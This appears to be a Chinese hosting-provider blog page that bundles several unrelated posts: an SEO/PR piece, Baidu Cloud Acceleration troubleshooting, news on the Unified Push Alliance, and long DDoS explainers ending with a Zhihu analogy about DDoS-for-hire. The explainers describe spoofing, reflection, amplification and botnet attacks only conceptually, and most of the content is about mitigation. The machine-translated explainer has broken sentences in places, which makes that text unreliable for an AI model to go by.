对于一些行业热词更是如此,比如“区块链”相关的新闻每天新发布数百篇,累计有6. 3 万篇,搜索引擎这时一定需要计算,为什么你的内容可以超越其它6. 3 万篇与“区块链”相关的新闻和 1820 万个相关网页,展示到用户的搜索视野范围? 这也解释了为什么老板搜索关键词,一篇新发布的内容并不能马上出现在首页的问题。 其实所谓的算法规则、指数都是参考,内容能够真正为用户提供价值才是根本关键。就像百度官方在其“百度搜索引擎工作原理”中所描述,影响搜索引擎结果排序的因素,随着算法和机器学习技术的在不断发展更新,并没有一个确切的维度和答案。 搜索引擎优化是一个长期的过程,无论是百度广告或第三方SEO公司,每年需要几十万,数百万的广告费或服务费的投入,而对于公关部门来讲,综合互联网、社交多渠道的新闻发布、内容营销是能够影响搜索引擎长尾最基础和性价比最高的手段。 有时候老板的期望值并不都是符合常理,李老师讲公关人要建立与老板对话的能力,How to manage your boss, 毕竟公关人的KPI,不只是让老板高兴,比如上百度首页这事儿。 #### 什么情况下百度云加速会回源 常有客户因为一些原因使用的百度云加速被回源了,这里主机吧来说下会被回源的几个原因:1.网站内容违规导致域名被拉黑了这个原因比较多,事实上百度云加速对内容加速审核是比较严格的。具体违规内容请查看<百度云加速禁止哪些内容网站接入>2.云加速套餐配置流量超了百度云加速每个版本都有相应的每天流量限制,其中免费版10G/天,专业版100G/天,商务版200G/天,企业版500G/天,如果使用流量超了会自动回源,具体查看使用情况可进入报表,CDN报表,查看当天套餐使用流量,如下图:3.被DDoS攻击峰值超了这个原因很少,主机吧接入几千个客户了,也出现两个被DDoS峰值超的,DDoS流量在报表上是看不到的,只能云加速通知,一般超的云加速都会提前通知升级,如不升级会给你回源。4.客户自己误操作回源这个不排除有,主机吧就遇到几个,可能想试功能什么的,操作回源。回源功能是在报表下拉的访问回源功能,以及子域名解析中编辑,状态,如下图:5.中途有一段时间长期未使用云加速有一些客户使用百度云加速用来防护的,一但没攻击了就转走了,导致一段时间长期未使用,又接入回来了,这样云加速是不会立即生效的,我们应该删除之前的接入,重新添加验证过后才会生效。好了,以上就是几个被百度云加速回源的原因,如果你的站不是以上原因回源的,可以联系下百度云加速官方企业QQ(4008768800 )咨询。 #### 什么情况,统一推送联盟黄了? 统一推送联盟于 2017 年 10 月正式成立,目标是在国内联合多家厂商制定安卓统一推送服务(Unified Push Service,简称 UPS)技术标准,为国内的消息推送服务建立统一的标准。今年 4 月份,统一推送联盟宣布更名为“统一推送工作委员会”。 目前统一推送工委会的最新消息是在 2022 年 7 月份,统一推送服务覆盖品牌包括华为、荣耀、OPPO、realme、一加、中兴、三星、vivo、iQOO、小米、Redmi、锤子、ROG、联想、拯救者和努比亚。 这样的一家联盟,今天被爆官方正在出售中…… 打开chinaupa.com官方只看到一张图……… 这预示着统一推送联盟2020年已经“死亡”了吗? #### 什么是 DDoS 攻击 以及它是如何工作的? IT 行业最近见证了分布式拒绝服务 (DDoS) 攻击的稳步增长。 多年前,DDoS 攻击被认为是新手攻击者犯下的小麻烦,他们这样做是为了好玩,并且相对容易缓解它们。 不幸的是,这种情况已经不复存在了。 DDoS 攻击现在是一项复杂的活动,在许多情况下是一项 大生意 。 InfoSecurity Magazine 报告称 ,2021 年第一季度有 290 万次 DDoS 攻击,比 2020 年同期增长 31%。 与 2020 年同期相比,2021 年第一季度的 DDoS 攻击增加了 31%,达到 290 万次 近年来,我们看到 呈指数级增长 ,导致企业在很长一段时间内无法运作。 2020 年 2 月,亚马逊网络服务 (AWS) 遭受了一次复杂的 DDoS 攻击,导致其事件响应团队持续数日忙碌,这也影响了全球客户。2021 年 2 月,EXMO 加密货币交易所成为 DDoS 攻击的受害者,导致该组织近五个小时无法运营。最近,澳大利亚经历了一次重大的、 持续的、由国家支持的 DDoS 攻击 。比利时也成为针对该国议会、 警察部门和大学 。 每天都会发生数十万次未命名、未记录但成功的 DDoS 攻击。 事实上,正是这些攻击是最有效和最昂贵的。 DDoS 上升趋势 有望继续 ,这使得具有缓解技能的 IT 专业人员需求量很大。 激烈的 IT 战:什么是 DDoS 攻击? 尽管变得越来越普遍,但 DDoS 攻击可能非常先进且难以打击。 但究竟什么是 DDoS 攻击,DDoS 代表什么? DDoS 是分布式拒绝服务的缩写。 当威胁参与者使用来自多个远程位置的资源来攻击组织的在线操作时,就会发生 DDoS 攻击。 通常,DDoS 攻击侧重于生成操纵 网络设备和服务(例如,路由器、命名服务或缓存服务)的默认设置,甚至正常工作。 事实上,这是主要问题。 复杂的 DDoS 攻击不一定要利用默认设置或开放中继。 他们利用正常行为并利用在当今设备上运行的协议最初是如何设计运行的。 就像社会工程师操纵人类交流的默认运作方式一样,DDoS 攻击者操纵我们都依赖和信任的网络服务的正常运作。 当发生 DDoS 攻击时,目标组织的一项或多项服务会遭受严重中断,因为攻击已经用 HTTP 请求和流量淹没了他们的资源,从而拒绝了合法用户的访问。 DDoS 攻击 ,被列为我们这个时代四大网络安全威胁之一 社会工程 、 勒索 和供应链攻击中 现代战争:避免混淆 DDoS 攻击 将 DDoS 攻击与其他网络威胁相混淆相对容易。 事实上,IT 专业人员甚至网络安全专业人员都非常缺乏关于 DDoS 攻击究竟如何工作的知识。 在 DDoS 攻击中,网络犯罪分子利用网络设备和服务器之间发生的正常行为,通常 针对 与 Internet 建立连接的网络设备。 因此,攻击者关注的是边缘网络设备(例如路由器、交换机),而不是单个服务器。 DDoS 攻击使网络管道(带宽)或提供 那个带宽。 这是一个有用的类比:想象有几个人同时给您打电话,这样您就无法拨打或接听电话或将您的电话用于任何其他目的。 这个问题一直存在,直到您通过您的提供商阻止这些呼叫。 请注意,您不会对您的实际移动设备进行修复、升级或以其他方式进行调整。 相反,您可以使用手机提供商的拦截服务来修复攻击者与您的手机之间的连接。 在 DDoS 攻击期间也会发生类似的事情。 您无需修改​​受到攻击的资源,而是在您的网络和威胁参与者之间应用修复程序(也称为缓解措施)。 DDoS 与 DoS 攻击:有什么区别? 避免将 DDoS(分布式拒绝服务)攻击与 DoS(拒绝服务)攻击混淆是很重要的。 尽管只有一个词将两者分开,但这些攻击的性质差异很大。 严格定义,典型的 DDoS 攻击操纵攻击者和受害者之间的许多分布式网络设备发动不知情的攻击,利用合法行为。传统的 DoS 攻击不使用多个分布式设备,也不关注攻击者和组织之间的设备。 这些攻击也往往不使用多个互联网设备。 典型的 DoS 攻击可能包括以下内容: 单源 SYN 泛洪: 当攻击者使用单个系统发出 SYN 数据包泛洪攻击,操纵典型的 TCP 三向握手时,就会发生这种情况。 例如,某人可能使用 Kali Linux 生成的 SYN 洪水 计算机不是真正的 DDoS 攻击,因为所进行的攻击仅来自一个设备。 即使攻击者使用 IP 地址欺骗也是如此。 对于网络级设备,真正的 DDoS 攻击是由网络级设备生成的。 换句话说,您使用多个路由器或 Memcached 服务器来攻击网络。“死亡 ping”: 多年前,一些网络驱动程序包含有缺陷的代码,如果它收到包含某些参数的 ICMP 数据包,则会导致系统崩溃。: slow loris 攻击 , slow loris 攻击通常称为 DDoS 攻击,但因为攻击针对的是特定服务器(在这种情况下 web 服务器)并且通常不使用中间网络设备,它通常是传统的 DoS 攻击。 上述每种 DoS 攻击都利用了特定主机中的软件或内核弱点。 要解决此问题,您需要修复主机和/或过滤掉流量。 如果您可以升级服务器以减轻攻击,那么它不符合条件 作为传统的 DDoS 攻击。 请记住,在 DDoS 攻击中,威胁行为者采用资源消耗策略。 该策略涉及使用看似合法的请求来压倒实际上不合法的系统,从而导致系统问题。 攻击策略:DDoS 攻击的类型 DDoS 攻击一般分为三种类型。 1. 应用层 2.协议 3. 体积 在某些情况下,IT 和网络安全专家将基于协议和应用程序的 DDoS 攻击视为一类。 收集英特尔:为什么您需要了解 DDoS 攻击 DDoS 攻击的问题越来越严重,IT 专业人员需要做好准备。 ,到 2020 年,到 2021 年,第 7 层攻击有所增加 据 CloudFlare 称 。,在 2020 年第一季度,超过 100 GB/s 的 DDoS 攻击数量增加了近十倍 (967%) 根据 Comparitech 。体积攻击的绝对规模已增加到压倒性的比例。 CloudFlare 还报告 说 500 Mbps DDoS 攻击已成为容量的标准 攻击。DDoS 攻击正变得越来越普遍。 2021 年 据 ZDNet 报道 DDoS 攻击在前两年至少增长了 154%。攻击变得更加复杂。 攻击者将 DDoS 与其他类型的攻击( 包括勒索软件 。DDoS 攻击者采用复杂的人工智能 (AI) 和机器学习方法来帮助进行攻击。 例如,DDoS 僵尸网络应用机器学习方法进行复杂的网络侦察,以找到 最脆弱的系统。 他们还使用人工智能重新配置自己,以阻止检测和改变攻击策略。 现代攻击很可能表现为防御者和攻击者将启用人工智能的系统相互对抗。DDoS 攻击者采用了混合攻击策略。 他们将各种攻击方法与社会工程、凭证窃取和物理攻击相结合,使实际的 DDoS 攻击只是多方面方法中的一个因素。 战术战:DDoS 攻击者如何避免检测 众所周知,DDoS 攻击很狡猾,因此很难确定。 它们如此狡猾的原因之一是难以确定原产地。 威胁行为者通常采用三种主要策略来发起 DDoS 攻击: 1. 欺骗 默认情况下,IPv4 和 IPv6 无法验证和跟踪流量。 特别是对于 IPv4 网络,欺骗源地址和目标地址非常简单。 DDoS 攻击者通过伪造具有 伪造的源地址。 因此,攻击者有可能通过向最初从未真正发出请求的受害主机发送数百万个回复来欺骗合法设备响应这些数据包。 2. 反思 攻击者通常希望隐藏他们参与 DDoS 攻击的任何痕迹。 为此,他们操纵互联网服务的默认行为,以便服务有效地隐藏实际的攻击者。 这些类型的攻击中经常使用的服务 包括数千个域名系统 (DNS)、网络时间协议 (NTP) 和简单网络管理 (SNMP) 服务器。 这是攻击者被 DDoS 策略吸引的主要原因之一。 互联网服务不仅提供 流量,但它们也往往使防御者更难追踪攻击的来源,因为大多数服务器不保留使用它们的服务的详细日志。 3. 放大 放大是一种策略,它让 DDoS 攻击者使用源倍增器生成大量流量,然后可以针对受害主机。 放大攻击不使用僵尸网络,它只是一种策略,允许攻击者 发送一个伪造的数据包,然后欺骗合法服务向受害者网络或服务器发送数百甚至数千条回复。 了解 DDoS 攻击使用正常的互联网操作来进行恶作剧非常重要。 这些设备不一定配置错误,它们实际上表现得像它们应该表现的那样。 攻击者只需 找到了一种方法来利用这种行为并操纵它来进行 DDoS 攻击。 此外,网络设备和服务通常会在不知情的情况下成为 DDoS 攻击的参与者。 这三种策略利用了全球网络资源的默认行为。 这些资源包括: 路由器开关防火墙负载均衡器缓存服务器边缘网络设备移动信号塔(包括4G和5G) 战斗持续时间:DDoS 攻击持续多长时间? DDoS 攻击的长度和复杂程度差异很大。 DDoS 攻击可能会持续很长时间,也可能非常短暂: 长期攻击: 在数小时或数天内发动的攻击被视为长期攻击。 例如,对 AWS 的 DDoS 攻击造成了三天的中断,最终得到缓解。突发攻击: 这些 DDoS 攻击在很短的时间内发动,仅持续一分钟甚至几秒钟。 不要被欺骗。 尽管速度非常快,但爆发攻击实际上可能极具破坏性。 随着物联网 (IoT) 设备和功能日益强大的计算设备的出现,有可能产生比 以往。 因此,攻击者可以在很短的时间内创建更多的流量。 突发 DDoS 攻击通常对攻击者有利,因为它更难追踪。 技术战:僵尸网络和 DDoS 攻击 僵尸网络是庞大的计算机网络,可用于发动 DDoS 攻击。 它们通常由受感染的计算机(例如, 物联网设备 、服务器、工作站、 路由器等)或僵尸,由中央服务器控制。 攻击者不一定需要僵尸网络来进行 DDoS 攻击。 威胁者可以简单地操纵互联网上数以万计的网络设备,这些设备要么配置错误,要么按设计运行。 尽管如此,重要的是 了解基于僵尸网络的 DDoS 攻击是如何发生的。 更复杂的数字敌人:DDoS 攻击的演变 网络安全的现实之一是,大多数攻击者都是中等天赋的人,他们以某种方式想出了如何操纵特定的网络条件或情况。 尽管经常讨论高级持续性威胁 (APT)和越来越老练的黑客,现实往往要平凡得多。 例如,大多数 DDoS 攻击者只是找到特定的协议。 他们会发现他们可以操纵传输控制协议 (TCP) 握手来创建 SYN 数据包或特定类型的服务器(例如内存)的洪水攻击 缓存守护进程(它通常被称为“Memcached”,用于内存缓存守护进程)。 Memcached 服务是一种经常用于帮助加速 Web 应用程序的合法服务。 攻击者经常利用 Memcached 实现 没有正确固定,甚至那些运行正常的。 攻击者还发现他们可以破坏物联网设备,例如网络摄像头或婴儿监视器。 但今天,攻击者得到了更多帮助。 最近的进步催生了具有前所未有潜力的人工智能和连接能力。 喜欢合法的 系统管理员、攻击者现在拥有语音识别、机器学习和数字路线图,可以让他们操纵您家中或办公室中的集成设备,例如智能恒温器、电器和家庭安全系统。 攻击计划:基于僵尸网络的 DDoS 攻击剖析 DDoS 流量有很多不同的种类。 在基于僵尸网络的攻击的情况下,DDoS 威胁参与者正在使用僵尸网络来帮助协调攻击。 了解流量类型将有助于选择主动识别措施 和缓解。 单击红色加号以了解有关每种 DDoS 流量的更多信息。 1. 指挥与控制 (C&C) 2. 协调 3. 信标/心跳流量 4.攻击流量 5. 运营技术(OT)/物联网 6. 异常流量 7. 多向量 组装武器:了解 DDoS 攻击如何工作的工具 DDoS 攻击有多种形式,并且一直在发展以包含各种攻击策略。 IT 专业人员必须具备有关攻击工作原理的知识。 有三种模型可以帮助深入了解 DDoS 攻击的内部运作: Lockheed Martin Cyber​​ Kill Chain : 用于帮助提供攻击策略框架,该模型概述了七个步骤 黑客可能会采取长期持续的 DDoS 攻击。 该模型不考虑使用僵尸网络来破坏系统。Mitre ATT&CK 模型 : 该模型描述了现实世界的攻击,并提供了已知对抗策略和技术的知识库,以帮助 IT 专业人员分析和预防 未来的事件。 此模型对于希望防御 DDoS 攻击的个人特别有用,因为它允许您分析攻击者并确定他们的策略。入侵分析 : 钻石模型帮助组织权衡对手的能力和能力 受害者,正如 CompTIA 博客中关于 三种主要网络安全模型 。 即使创建了 Diamond 模型 为了模拟实际入侵,它对于识别 DDoS 攻击也很有用。 作为一名 IT 专业人员,了解如何应对 DDoS 攻击至关重要,因为随着时间的推移,大多数组织都必须管理各种类型的攻击。 安全分析师和威胁猎手经常使用 ATT&CK 模型和 Mitre ATT&CK 导航器可帮助识别允许 DDoS 攻击特别成功的条件。 主要攻击简史:DDoS 示例 多年来,分布式拒绝服务攻击的数量非常多。 让我们从主要 DDoS 攻击的简短列表开始,它们背后的动机以及它们对我们数字世界的持久影响。 点击 红色加号以了解有关这些主要 DDoS 攻击的更多信息。 1.爱沙尼亚:2007年4月27日 2. 格鲁吉亚共和国:2008 年 7 月 20 日 3. Spamhaus:2013 年 3 月 18 日 4.占中:2014年6月 5. 动态:2016 年 10 月 21 日 6. GitHub:2018 年 2 月 28 日 7. 亚马逊网络服务 (AWS):2020 年 2 月 8. 谷歌:2017 年 9 月(2020 年 10 月报告) 9. 特定部门的攻击:2019-2021 攻击者简介:谁执行 DDoS 攻击? 您经常看到邪恶的、戴着黑头巾的人的图像来象征恶意威胁者。 实际上,这些攻击者群体通常为当局所熟知,并使用 DDoS 策略来获得影响力,扰乱政府和军事行动 或导致人们对市场部门、公司品牌或历史悠久的机构失去信心。 无论驱动这些攻击的动机如何,黑客都可以很容易地被雇佣来帮助发起 DDoS 攻击——就像雇佣枪支一样。 租用个人或整个商业团体 暗网上 , 通常在服务模式下,类似于 基础设施即服务 (IaaS) 或 软件即服务 (SaaS) 的 。 事实上,Radware 于 2020 年 8 月发布了全球安全警报,以应对日益流行的 DDoS 出租攻击。 是什么激发了攻击:DDoS 攻击背后的原因 为了阻止 DDoS 攻击,了解导致事件的原因很重要。 虽然 DDoS 攻击在战术和方法方面的性质差异很大,但 DDoS 攻击者也可能有多种动机,包括以下内容。 财务动机: DDoS 攻击通常与勒索软件攻击相结合。 攻击者发送消息通知受害者,如果受害者支付费用,攻击将停止。 这些攻击者通常是有组织犯罪集团的一部分。 然而,今天,这些辛迪加可以小到十几个人,拥有网络知识和额外的时间。 有时,竞争对手的企业甚至会相互进行 DDoS 攻击以获得竞争优势。意识形态动机: 攻击通常针对政治局势中的压迫性管理机构或抗议者。 此类 DDoS 攻击通常用于支持特定的政治利益或信仰体系,例如宗教。国家支持的动机: 当政治动荡或分歧变得明显时,DDoS 攻击通常会引起军队或平民的混乱。战术动机: 在这种情况下,DDoS 攻击是作为更大活动的一部分发动的。 在某些情况下,该活动包括物理攻击或其他一系列基于软件的攻击。 例如,众所周知,军队会结合 DDoS 攻击 与物理的。 战术攻击用于转移对正常 IT 任务的注意力,以利用不同的目标——旧的诱饵和转换网络攻击。商业/经济动机: 这种类型的 DDoS 攻击有助于收集信息或对特定行业造成损害。 例如,对索尼、英国航空公司和 Equifax 等公司的攻击导致消费者对整个 行业。勒索动机: 其他攻击用于通过勒索手段获得一些个人或金钱利益。 导弹发射:执行 DDoS 攻击的工具 攻击者使用多种设备来攻击组织。 以下是 DDoS 攻击中使用的一些常用工具: 服务: 包括 Memcached(用于加速数据库和基于 Web 的事务)、DNS 服务器、NTP 和 SNMP。网络设备: 网络设备包括路由器和交换机等项目。僵尸网络: DDoS 攻击中常用的受感染系统的集合。物联网设备: 网络犯罪分子可以利用联网设备的弱点,将其变成僵尸。 臭名昭著的 Mirai 僵尸网络被用来使用不安全的婴儿监视器发起一系列攻击。AI: 黑客正在使用人工智能在 DDoS 攻击期间自动修改代码,因此尽管有保护措施,攻击仍然有效。旧设备的利用: 较旧的硬件通常面临更多漏洞,并且经常成为目标和利用。 侦察的作用:跟踪 DDoS 攻击 DDoS 攻击者每天都变得越来越精明。 攻击的规模和持续时间都在扩大,没有放缓的迹象。 组织需要密切关注事件的脉搏,以了解他们对 DDoS 攻击的敏感程度。 以下是一些可以帮助您跟踪最新 DDoS 攻击的资源: Mazebolt 全球 DDoS 攻击列表 : 该资源提供了一个正在运行的攻击列表,其中包含日期、原产国、停机时间等信息, 攻击细节,甚至链接到有关事件的新闻信息。网络安全威胁情报 (CTI) 共享资源:CompTIA ISAO : CompTIA 拥有一个组织,致力于共享与威胁相关的情报并提供可操作的洞察力以减轻威胁 并解决网络安全挑战。美国 CISA 自动指标共享 : CISA 提供的工具可以实时共享网络威胁信息,以帮助限制攻击的普遍性。FBI Infragard : 作为 FBI 和私营部门之间的合作伙伴,InfraGard 支持共享有关攻击和缓解技术的信息。数字攻击地图 : 该地图显示了全球 DDoS 攻击的实时信息,并允许您按类型、源端口、持续时间和目标端口进行过滤。AlienVault Open Threat Exchange : 这个威胁情报社区提供对威胁指标的免费访问,并允许与他人共享威胁研究。Threatbutt Internet Hacking Attack Attribution Map : 该地图提供对全球 DDoS 攻击的实时跟踪。它现在下降了吗? : 当您怀疑有攻击时,此资源是一个很好的起点。 通过输入域和此工具检查网站是否已关闭 将立即返回结果。 已确定目标:DDoS 攻击者最常针对什么? 尽管任何行业的组织都容易受到攻击,但这些行业最常受到 DDoS 攻击: 卫生保健政府互联网服务提供商 (ISP)云服务提供商 盯上敌人:识别 DDoS 攻击 从战术 DDoS 缓解的角度来看,您需要具备的主要技能之一是模式识别。 能够发现表示 DDoS 攻击正在发生的重复是关键,尤其是在初始阶段。 自动化应用程序和 人工智能通常被用作助手,但通常公司需要熟练的 IT 专业人员来区分合法流量和 DDoS 攻击。 工作人员通常会寻找以下警告信号,表明 DDoS 攻击正在发生: 来自现有缓解设备(例如负载平衡器、基于云的服务)的报告客户报告服务缓慢或不可用使用相同连接的员工也会遇到速度问题在短时间内来自特定 IP 地址的多个连接请求未执行维护时收到 503 服务不可用错误由于生存时间 (TTL) 超时,对技术资源的 Ping 请求超时日志显示流量异常巨大 响应威胁:用于缓解 DDoS 攻击的响应技术、服务和策略 DDoS 缓解与缓解其他网络攻击(例如源自勒索软件的攻击)完全不同。 DDoS 攻击通常通过能够处理这些类型攻击的设备和服务来缓解。 例如,今天的 负载均衡器有时能够通过识别 DDoS 模式然后采取行动来处理 DDoS 攻击。 其他设备可用作中介,包括防火墙和专用洗涤器设备。 在尝试缓解 DDoS 攻击时,您希望专注于在您的网络和用于攻击您的系统之间放置服务和设备。 由于攻击者通过利用合法的网络和互联网行为来产生 DDoS 流量,任何 连接的设备或服务器很容易受到攻击,因为它本质上不被认为是恶意的。 您必须创建一个中间缓解解决方案来响应该攻击。 在勒索软件或恶意软件攻击中,安全专业人员 通常通过升级端点上的软件或从备份恢复来解决问题。 应对威胁:DDoS 攻击响应的 5 个步骤 响应 DDoS 攻击的典型步骤包括: 1、检测 早期检测对于防御 DDoS 攻击至关重要。 寻找上面提供的警告标志,表明您可能成为目标。 DDoS 检测可能涉及调查数据包的内容以检测第 7 层和基于协议的攻击或利用 基于速率的措施来检测容量攻击。 当谈到 DDoS 攻击时,通常首先讨论基于速率的检测,但大多数有效的 DDoS 攻击并不能使用基于速率的检测来阻止。 2.过滤 透明的过滤过程有助于丢弃不需要的流量。 这是通过在网络设备上安装有效规则以消除 DDoS 流量来完成的。 3. 导流和重定向: 此步骤涉及转移流量,使其不会影响您的关键资源。 您可以通过将 DDoS 流量发送到清理中心或其他充当污水坑的资源来重定向 DDoS 流量。 通常建议您透明地 沟通正在发生的事情,这样员工和客户就不需要为了适应缓慢而改变他们的行为。 4、转发与分析: 了解 DDoS 攻击的来源很重要。 这些知识可以帮助您开发协议以主动防御未来的攻击。 虽然试图杀死僵尸网络可能很诱人,但它可能会造成后勤问题,并可能 导致法律后果。 一般不推荐。 5. 替代交付 在发生攻击时,可以使用几乎可以立即提供新内容或打开新网络连接的替代资源。 缓解 DDoS 攻击的最佳方法之一是在事件响应过程中以团队的形式进行响应并进行协作。 上述步骤只能通过服务、设备和个人的结合来实现。 为了 例如,为了缓解第 7 层 DDoS 攻击,通常需要执行以下操作: 检测: 组织将结合使用安全分析师和渗透活动来识别第 7 层攻击模式。 渗透测试员一般会模拟DDoS攻击,安全分析师会仔细聆听 识别独特的特征。流量过滤: 使用清理中心和服务来帮助重定向和遏制有害流量。第 7 层控制: 验证码和 cookie 质询通常用于确定网络连接请求是来自机器人还是合法用户。将数据包转发给安全专业人员进行进一步分析: 安全分析师将参与模式识别活动,然后根据他们的发现推荐缓解措施。第 7 层攻击期间的替代交付: 当您的资源对抗攻击时,使用 CDN(内容交付网络)可以帮助支持额外的正常运行时间。 需要注意的是,缓解设备可能会遇到 问题。 它可能没有正确更新或配置,实际上可能成为 DDoS 攻击期间问题的一部分。 限制损害:DDoS 缓解技术 一旦您知道自己正面临 DDoS 攻击,就该进行缓解了。 准备战斗! 物理设备在 DDoS 攻击期间管理物理设备在很大程度上仍然是与其他缓解工作不同的类别。 通常称为设备,物理设备是分开的,因为 DDoS 模式和流量是如此独特和困难 来正确识别。 即便如此,设备可以非常有效地保护小型企业免受 DDoS 攻击。云擦洗设备这些服务通常被称为清洗中心,插入在 DDoS 流量和受害网络之间。 他们获取针对特定网络的流量,并将其路由到不同的位置,以将损害与预期来源隔离开来。 清理中心清理数据,只允许合法的业务流量传递到目的地。 清理服务的示例包括由 Akamai、Radware 和 Cloudflare 提供的服务。多个互联网服务连接由于 DDoS 攻击经常试图用流量淹没资源,因此企业有时会使用多个 ISP 连接。 如果单个 ISP 不堪重负,则可以从一个切换到另一个。黑洞这种 DDoS 缓解技术涉及使用云服务来实施称为数据接收器的策略。 该服务将虚假数据包和大量流量引导到数据接收器,在那里它们不会造成任何伤害。内容交付网络 (CDN)这是一组地理位置分散的代理服务器和网络,通常用于 DDoS 缓解。 CDN 作为一个单元工作,通过多个骨干网和 WAN 连接快速提供内容,从而分配网络负载。 如果 当一个网络被 DDoS 流量淹没时,CDN 可以从另一组未受影响的网络传送内容。负载平衡服务器通常部署用于管理合法流量,负载平衡服务器也可用于阻止 DDoS 攻击。 当 DDoS 攻击正在进行时,IT 专业人员可以利用这些设备将流量从某些资源转移。Web 应用防火墙 (WAF)WAF 用于过滤和监控 HTTP 流量,通常用于帮助缓解 DDoS 攻击,并且通常是 AWS、Azure 或 CloudFlare 等基于云的服务的一部分。 虽然有时有效,但专用设备或基于云的洗涤器 通常建议改为。 WAF 专注于过滤到特定 Web 服务器或应用程序的流量。 但是,真正的 DDoS 攻击集中在网络设备上,从而拒绝最终为 Web 服务器提供的服务。 仍然, 有时可以将 WAF 与其他服务和设备结合使用以响应 DDoS 攻击。 市场上几乎所有的 DDoS 缓解设备都使用相同的五种机制: 签名行为或 SYN 洪水基于速率和地理位置:如上所述,这通常不可靠。僵尸网络检测/IP 信誉列表:使用列表的成功与否取决于列表的质量。挑战与回应 DDoS 缓解服务 目前市面上很多应对DDOS的防御服务,这里主机吧简单介绍几种。 DDoS 缓解供应商提供的服务高防服务器托管于高防数据中心的服务器,适合网站、游戏等服务高防IP通过高防机房资源配合防御软件,可防网站、app、游戏等业务。高防CDN利用多地防御节点,分布式防御的服务,适用于网站、APP业务。游戏盾专为游戏行业定制,针对性解决游戏行业中复杂的DDoS攻击、游戏CC攻击等问题。WAF防火墙Web应用防火墙对网站或者APP的业务流量进行恶意特征识别及防护,将正常、安全的流量回源到服务器,适用于网站、APP业务。高防DNS顾名思义就是一种高防域名系统,可防御DNS攻击。 要知道的术语 ACK: 确认字符DNS: 域名系统HTTP: 超文本传输​​协议ICMP: 互联网控制消息协议OSI/RM: 开放系统互连/参考模型事件响应: 管理 DDoS 攻击时要采取的步骤。SYN: 同步数据包SYN 洪水: 攻击者操纵三向 TCP 握手来创建 DDoS 攻击。TCP: 传输控制协议TCP 握手: 当两台计算机在 TCP 会话开始时相互通信时发生的一个三步过程。 也称为 TCP 三向握手。UDP: 用户数据报协议 #### 什么是 DDoS 攻击?DDoS 攻击的种类与DDoS 攻击的影响 什么是 DDoS 攻击? 分布式拒绝服务(DDoS)攻击是一种恶意行为,利用大量互联网流量来淹没目标服务器、服务或网络,干扰其运行或使其下线。DDoS 攻击者利用恶意软件控制在线计算机、路由器、物联网设备和其他设备,并将其作为攻击流量的来源。被感染的设备通常被称为机器人(bot),一组机器人则被称为“僵尸网络(botnet)”。在攻击过程中,僵尸网络中的每台设备同时向目标发送请求,企图超过目标的流量上限,导致对正常流量的拒绝服务。 DDoS 攻击的种类 DDoS 攻击的目标可以是 OSI 模型中七“层”中的任何一个。虽然所有这些攻击都涉及用恶意流量淹没目标,但它们可以划分成三个不同的类别。这些类别描述了攻击发生的地点和方式。 容量耗尽攻击这些攻击利用巨大的流量淹没目标站点和网络——流量远高于任何其他类型的攻击。这些攻击常常利用DNS 放大和其他暴力技术来产生巨大的流量激增,以比特率/秒(bps)来衡量。(在 DNS 放大攻击中攻击者使用公开 DNS 解析器来以放大后的流量淹没目标。 协议攻击协议攻击以 OSI 模型的第 3 层(网络层)和第 4 层(传输层)中的漏洞为目标,旨在消耗 Web 服务器或其中间资源(包括防火墙和负载平衡器)的所有可用容量。这些攻击均以数据包/秒(pps)为单位衡量,包括:• SYN 洪水:这种攻击重复发送初始连接请求(SYN)包,以淹没目标服务器上所有可用的端口。• Ping of Death 攻击:攻击者向目标发送超过最大允许大小的包,导致目标冻结或崩溃。• Smurf DDoS:在这种攻击中,攻击者利用 互联网控制消息协议(ICMP)包来淹没服务器。 应用层攻击这些攻击以 OSI 第 7 层为目标。在这一层,作为对 HTTP 或 HTTPS 请求的回应,服务器生成网页并发送出去。这些攻击相当于在许多计算机上同时反复刷新网页。因此,所产生的 HTTP/S 请求洪水以请求数/秒(Rps)来衡量。 这些类型的攻击之间存在一些重叠。例如,部分协议攻击可能属于容量耗尽型攻击。同时,还有多手段攻击,其中攻击者以协议堆栈的多层为目标,或同时发动,或作为对目标的反制措施的响应。 DDoS 攻击的影响 DDoS 攻击一旦成功,其直接影响是目标服务的性能下降或直接中断。目标服务的全部或部分可能无法访问。这些性能上的挑战有更广泛的影响。对 web 应用而言,性能低下带来一系列不利影响,包括更高的跳出率,更低的转化率,以及品牌声誉受损。对企业网络而言,性能欠佳导致员工无法完成很多日常工作。此外,一些 DDoS 攻击是掩盖其他攻击的烟幕,使安全团队分心应对,以便攻击者通过其他手段实现其最终目标。在这种情况下,目标组织有可能遭遇未授权的应用访问、恶意软件感染、数据丢失或更糟的情况。 #### 什么是 DDoS 攻击?又有那些著名的案例? 作者:谢幺 链接:https://www.zhihu.com/question/22259175/answer/394917916 来源:知乎 如果把互联网上的网站或服务器看作一个个商店(比如淘宝、京东、微信等等),每个访问网站的网民看作是商店里的顾客。DDoS 就相当于一堆小混混装成正常顾客涌入商店,逛来逛去赖着不走让正常的顾客进不来,或者跟售卖员有一搭没一搭地说话,占用他们的时间,让他们无法正常服务客户。 上个月,国内多家直播平台就遭遇了大规模流量攻击,然后就在前几天(2018年5月中旬),知名IT博主阮一峰的博客站遭遇“网络打手”,网站被迫暂时下线。 -------正文分割线----- 滴滴打车,你一定听过,目前中国最大的出行平台;DD打人,或许你没听过,它是一个雇打手打人的平台。 几乎每个人都有过这样的经历: 某件事或某个人触动了你的底线,你气到咬牙切齿浑身发抖,恨不得上去猛抽丫两个大嘴巴子。 但是,理智让你放下手,法律常识让你松开拳头,社会地位让你保持形象,或者瘦弱的身体让你认怂,因为根本打不过对方。 有了「DD打人」,您只需一键下单注明打人需求(目标是谁、打多狠、打多久),平台会自动帮您联系附近的打手为您服务,揍人任务完后,平台会自动结算,您可根据服务质量给予打手1~5 星评价。 (图片源自网络) 无论临时起意还是蓄谋已久,无论目标是情敌、生意对手、老板还是路人,打手们都将竭能为您服务,几十元就能让您报仇雪恨 ... ... 总之,打人请认准 DD打人,我们不生产仇恨,我们只是打手的搬运工。 。。。 。。。 。。。 好吧,我承认编不下去了,现实世界里警察绝对不会容许这样的平台出现。 但是, 物理世界没有不代表网络世界没有。在网络世界,这样的暴力平台并不少见。 一个月多前,欧洲刑警组织就端掉了一个超大型黑客版"DD打人"平台。 据说在那个平台上,网络攻击被打包成了包月服务公开售卖,用户花很少的钱就能打瘫别人的网站和服务器。 据说警方捣毁该平台以后,整个欧洲的同类网络攻击数量降了整整60%! 那次行动代号"断电行动"(Power off Operation)。下面请跟我一起进入这个真实的网络追捕行动。 - 开始断电 - 